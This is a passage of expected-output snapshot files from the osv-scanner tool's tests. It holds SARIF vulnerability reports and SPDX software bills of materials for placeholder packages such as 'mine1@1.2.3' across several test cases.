[OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these 
vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is 
vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd 
or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" 
} } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- ================================================ FILE: internal/output/__snapshots__/spdx_test.snap ================================================ [TestPrintSPDXResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, 
"sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.3.5" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": 
"CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { 
"referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.3.5" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": 
"SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", 
"supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.3.5" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", 
"relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "author1/mine1", "SPDXID": "SPDXRef-Package-author1-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the php/composerlock extractor from /path/to/my/first/lockfile", 
"licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/author1%2Fmine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the dotnet/packageslockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:nuget/mine1@1.3.5" } ] }, { "name": "author1/mine1", "SPDXID": "SPDXRef-Package-author1-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the php/composerlock extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { 
"referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/author1%2Fmine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-author1-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-author1-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-author1-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-author1-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", 
"downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.3.5" } ] }, { "name": "mine1", "SPDXID": 
"SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/multiple_sources_with_no_packages - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated 
SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/no_sources - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/one_source_with_no_packages - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", 